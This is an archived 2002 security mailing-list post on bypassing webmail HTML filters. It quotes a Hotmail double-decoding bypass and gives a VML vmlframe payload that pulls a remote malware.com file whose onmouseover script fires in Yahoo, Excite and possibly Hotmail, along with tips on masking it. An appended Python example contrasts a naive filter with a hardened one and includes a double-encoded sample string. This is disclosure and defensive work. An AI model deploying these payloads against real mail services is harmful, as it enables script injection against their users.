Re: double decoding filter bypass (Hotmail) + challenge for you

From: http-equivat_private
Date: Wed Jul 17 2002 - 16:16:35 PDT


    <!-- So what about Hotmail? Well, where can we put Unicode in an 
    HTML message? Into a URL as %xx, yep, but that's not the point 
    here. There is a thing called "HTML entities": you can replace *any* 
    printable character with its ASCII/Unicode value in the values of the 
    parameters of HTML tags, for instance in the parameters of the STYLE 
    tag (hint!).  "A" is &#x41, "B" is &#x42, etc.
    >What the Hotmail filter did was replace any HTML entity by its 
    corresponding character, then try to filter out any bad string 
    (forbidden keywords), THEN give the output to the user, without re-
    applying the filter to this output. But if there are still HTML 
    entities in this output, the user's browser will interpret them, 
    which will possibly give birth to some interesting forbidden 
    keywords... and fire a script.-->
    
    
    Excellent. 
    
    Here's another one for you FozZY:
    
    <HTML xmlns:v = "urn:schemas-microsoft-com:vml">
    <STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>
    
    <v:vmlframe 
    style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px; 
    HEIGHT: 200px" 
    src = 
    "http://www.malware.com/fooness.vml#malware"></v:vmlframe>
    
    where fooness.vml#malware is:
    
    <xml xmlns:v = "urn:schemas-microsoft-com:vml">
    <v:rect id="malware" fillcolor="green" 
    style="position:relative;top:1;left:1;width:20;height:20"
    onmouseover="alert('malware was here')">
    </v:rect>
    </xml>
    
    1. This works on Yahoo and Excite, probably others
    2. Quick fiddling suggests only mouseover works
    3. Hotmail only filters this:
    
    <HTML xmlns:v = "urn:schemas-microsoft-com:vml">
    <STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>
    
    which is absolutely required. Probably easier to mask than 
    say "Javascript"
    
    note 1: can't recall, Hotmail may not allow for retrieval of files 
    remotely, or base64-encodes them on the Hotmail server if there are 
    any. If so, you can embed and CID: the fooness.vml
    
    note 2: the above may also work in IE-dependent mail clients 
    (Eudora..?..)
    
    note 3: doesn't want to work in Outlook Express with scripting off, 
    even though the frame aspect works - which is patched in OE6
    
    -- 
    http://www.malware.com
    
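The quoted paragraph describes the filter's order of operations (decode entities once, strip keywords, emit without re-checking) and why an entity that survives the single decode is left for the browser. The following is an added illustration written for this archive page; it is not code from FozZy, http-equiv or Hotmail. The keyword list, the `naive_filter` / `hardened_filter` names and the two sample messages are constructed for the demonstration. The hardened version checks the form the browser will actually interpret (decode to a fixpoint, bounded), treats more than one level of entity encoding as a reason to reject, and emits that canonical form so browser-side decoding cannot add anything the filter did not see.

```python
import html
import re
from typing import Tuple

# Toy "forbidden keywords" list, modelled on the idea in the quoted post.
FORBIDDEN = ("javascript", "onmouseover", "behavior")

# Constructed sample messages (not taken from the post).
BENIGN = '<p style="color: &#x72;ed">Tom &amp; Jerry</p>'
DOUBLE_ENCODED = '<div style="x: &amp;#x6a;avascript">hi</div>'


def naive_filter(message: str) -> str:
    """Decode entities once, strip forbidden keywords, then emit.

    This is the order of operations the post attributes to the Hotmail
    filter: the output is never re-checked, so an entity that survives the
    single decode is handed to the browser, which decodes it again."""
    decoded = html.unescape(message)
    pattern = "|".join(re.escape(k) for k in FORBIDDEN)
    return re.sub(pattern, "", decoded, flags=re.IGNORECASE)


def canonicalize(text: str, max_rounds: int = 5) -> Tuple[str, int]:
    """Decode entities until the text stops changing.

    Returns the fixpoint and the number of decode rounds it took.
    Legitimate content needs at most one round; deeper nesting is itself
    a useful detection signal."""
    rounds = 0
    while rounds < max_rounds:
        decoded = html.unescape(text)
        if decoded == text:
            return text, rounds
        text = decoded
        rounds += 1
    raise ValueError("entity nesting deeper than %d rounds" % max_rounds)


def hardened_filter(message: str, max_depth: int = 1) -> str:
    """Check what the browser will interpret, and emit exactly that.

    1. decode entities to a fixpoint (bounded);
    2. reject anything needing more than max_depth decode rounds;
    3. reject if a forbidden keyword appears in the canonical form;
    4. emit the canonical form, which contains no further entities.
    Rejecting rather than stripping avoids a second round of surprises."""
    canonical, depth = canonicalize(message)
    if depth > max_depth:
        raise ValueError("rejected: %d levels of entity encoding" % depth)
    lowered = canonical.lower()
    for keyword in FORBIDDEN:
        if keyword in lowered:
            raise ValueError("rejected: forbidden keyword %r" % keyword)
    return canonical


def browser_view(filtered_output: str) -> str:
    """What the user's browser sees: one more round of entity decoding."""
    return html.unescape(filtered_output)


if __name__ == "__main__":
    out = naive_filter(DOUBLE_ENCODED)
    print("naive filter emitted :", out)
    print("browser interprets   :", browser_view(out))
    for label, msg in (("benign", BENIGN), ("double-encoded", DOUBLE_ENCODED)):
        try:
            print(label, "-> accepted:", hardened_filter(msg))
        except ValueError as err:
            print(label, "->", err)
```

Run directly, the script shows the naive filter emitting a STYLE value that contains no forbidden keyword, while the browser's view of the same output does; the hardened filter refuses that message because it needs two decode rounds, and passes the benign one unchanged after a single decode.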



    This archive was generated by hypermail 2b30 : Wed Jul 17 2002 - 18:12:04 PDT